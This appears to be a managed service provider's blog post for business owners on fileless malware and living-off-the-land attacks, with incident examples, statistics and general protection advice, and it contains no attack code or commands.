As a business owner or manager, you know the importance of keeping your company safe from cyber threats. However, in recent years, a new type of malware has emerged that may not be on your radar: fileless malware.
This insidious type of malware has been on the rise, with some estimates showing that up to 77% of successful attacks now use fileless exploits. In this article, we will explore what fileless malware is, the types you should be aware of, and how to protect your business from these unseen and dangerous attacks.
What is Fileless Malware?
First, let’s define what we mean by fileless malware. We are actually combining two terms under one umbrella here, with fileless malware and LOTL (Living off the Land), both being techniques used by cybercriminals to evade detection by traditional antivirus solutions, but differing in the way they carry out the attack. While fileless malware executes malicious code in memory without leaving a trace on disk, LOTL leverages legitimate tools and applications already present on the system.
Both contracts with traditional malware as it is delivered to a victim’s computer in the form of a file, such as an executable or a document with a macro. Once the file is executed, the malware is activated and can begin its attack.
The top areas of fileless malware and LOTL include:
- PowerShell – a command-line shell and scripting language that is installed by default on Windows operating systems.
- Windows Management Instrumentation (WMI) – a system management technology that provides a standardized way for developers to access and manipulate system data on Windows.
- Word Macros / VBS (Visual Basic Scripting) – It’s a popular scripting language used by cybercriminals to create fileless malware that can evade detection by traditional antivirus software. Due to its ease of use and versatility, VBS remains a prevalent choice for threat actors looking to develop fileless malware.
- .Net – .NET is a software development framework commonly used by Microsoft Office, Visual Studio, Adobe Suite, and Quickbooks. The versatility and functionality offered by the .NET framework also make it a popular choice for developing fileless malware by cybercriminals.
- Web browsers – attackers may exploit vulnerabilities in web browsers like Chrome or Firefox to execute code in the context of the user’s web session.
These are just a few examples, as there are many different programs and processes that could potentially be exploited by fileless malware attacks.
The Rise of Fileless Malware Attacks
According to the 2020 SonicWall Cyber Threat Report, while malware decreased 6% globally, new threats have begun to mask their exploits within today’s most trusted files. Office (20.3%) and PDFs (17.4%) represent 38% of new threats detected by Capture ATP.
This means that traditional antivirus software may not be able to detect fileless malware. In fact, a study by Ponemon Institute found that 77% of successful attacks now use fileless exploits to evade traditional signature-based antivirus software.
Types of Fileless Malware and What Each Can Mean to Your Business
There are several types of fileless malware that you should be aware of. First, there is PowerShell-based malware, which is a scripting language that is built into Windows. Attackers can use PowerShell to launch malicious code and perform actions on the victim’s machine, such as stealing data or installing more malware. This type is particularly effective because PowerShell is a legitimate tool that is trusted by most antivirus software.
Another type is called “living off the land” or “LOL” malware. This type of malware takes advantage of legitimate tools and processes that are already installed on the victim’s machine. By using trusted applications, LOL malware can evade detection and perform its malicious actions, such as stealing credentials or spreading to other machines on the network.
Finally, there is polymorphic fileless malware, which modifies functions and processes without needing to be a standalone file. This makes it difficult to detect and stop. According to Dark Reading, 24% of respondents in a recent survey cited polymorphic fileless malware as a major area of concern, up from 14% the previous year.
Learn more about how to simplify your company’s cybersecurity.
Fileless Malware Examples
Fileless malware can be used for a variety of attacks, such as stealing data, spreading to other machines on the network, or encrypting files for ransom. Here are a couple of examples:
- There’s the Emotet trojan, which has been used in several high-profile attacks. One notable example of the impact of Emotet was the 2019 attack on the city of Allentown, Pennsylvania. The city’s computer systems were infected with Emotet, which caused widespread disruption to municipal services, including the police department, fire department, and city hall. The city was forced to shut down its computer network for several weeks, causing significant financial losses and disrupting services for residents.
- In 2020, a variant of the infamous Ryuk ransomware emerged that was completely fileless. The ransomware was able to encrypt files and demand a ransom without leaving any trace on the system’s hard drive. The attack affected multiple organizations in the healthcare industry, causing significant disruption and financial losses.
Fileless Malware Protection
Given the stealthy and sophisticated nature of this type of threat, it’s crucial to implement a layered approach to cybersecurity. Here are some key steps to take to protect your business from attacks:
- Keep your software up-to-date: Make sure all of your software and operating systems are up-to-date with the latest patches and security updates.
- Implement endpoint security solutions: As mentioned earlier, traditional antivirus software may not be enough to protect against these attacks. Consider investing in more advanced endpoint security solutions that can detect and prevent fileless malware.
- Utilize behavioral analysis and machine learning: These technologies can help detect and prevent fileless malware attacks by identifying abnormal behavior patterns and blocking malicious activity.
- Limit user privileges: Restricting user access and privileges can limit the damage that fileless malware can cause. For example, only granting administrative access to users who truly need it.
- Educate your employees: Training employees on safe browsing habits, recognizing phishing attempts, and other best practices can help prevent fileless malware attacks.
Learn more about how to close your IT knowledge gap with some outside help.
In conclusion, protecting your business from the unseen and dangerous threat of fileless malware attacks can be a complex and challenging task. This is where partnering with a Managed Service Provider (MSP) can be invaluable.
It’s important to stay up-to-date on the latest threats and implement a layered approach to cybersecurity that includes advanced endpoint security solutions, behavioral analysis, and machine learning. Additionally, restricting user privileges and educating employees on best practices can help prevent attacks. A lot of times, we see businesses struggle to handle all of this internally.
By taking a proactive approach to cybersecurity, you can help protect your business from the unseen and dangerous threat of fileless malware attacks.